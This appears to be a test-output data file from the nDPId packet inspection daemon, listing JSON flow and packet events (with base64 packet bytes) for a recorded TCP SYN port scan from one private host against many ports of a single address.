-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs3P8AAC4GPXOsEAAIQA2GNIzTBK\/dU4MZAAAAAGACDAAn3QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAstBMAACsGaV+sEAAIQA2GNIzTB1PdU4MZAAAAAGACEAAhOQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAEAADUG43GsEAAIQA2GNIzTDT7dU4MZAAAAAGACCAAjTgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsRyIAAC0G1FCsEAAIQA2GNIzTIf3dU4MZAAAAAGACCAAOjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsWeIAACUGyZCsEAAIQA2GNIzTBDvdU4MZAAAAAGACCAAsUQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAso64AADAGdMSsEAAIQA2GNIzSgAvdUoMYAAAAAGACBAC0gwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAss6AAADcGXdKsEAAIQA2GNIzSwATdUoMYAAAAAGACEABoigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmIAACkG+RCsEAAIQA2GNIzSFYbdUoMYAAAAAGACCAAbCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsVkIAACsGxzCsEAAIQA2GNIzSFb7dUoMYAAAAAGACEAAS0QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsE28AADgG\/QOsEAAIQA2GNIzSJw\/dUoMYAAAAAGACBAANgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs68EAAC8GLbGsEAAIQA2GNIzSJQ3dUoMYAAAAAGACEAADggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsD9gAADIGBpusEAAIQA2GNIzSDybdUoMYAAAAAGACDAAdaQAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs9s8AADsGFqOsEAAIQA2GNIzSAFTdUoMYAAAAAGACEAAoOwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmoAADEG2QisEAAIQA2GNIzSDtndUoMYAAAAAGACCAAhtgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsHzcAADAG+TusEAAIQA2GNIzSRkTdUoMYAAAAAGACBADuSgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsh2UAACoGlw2sEAAIQA2GNIzSwALdUoMYAAAAAGACDABsjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsFxcAADoG91usEAAIQA2GNIzSJxrdUoMYAAAAAGACDAAFdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsAXUAADoGDP6sEAAIQA2GNIzSFlbdUoMYAAAAAGACDAAWOQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+cAAC0Ga4usEAAIQA2GNIzSDGDdUoMYAAAAAGACCAAkLwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsi1sAADkGhBesEAAIQA2GNIzSC77dUoMYAAAAAGACCAAk0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uIAADYGP5CsEAAIQA2GNIzTBDbdU4MZAAAAAGACDAAoVgAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsPTUAAC8G3D2sEAAIQA2GNIzTAS3dU4MZAAAAAGACEAAnXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 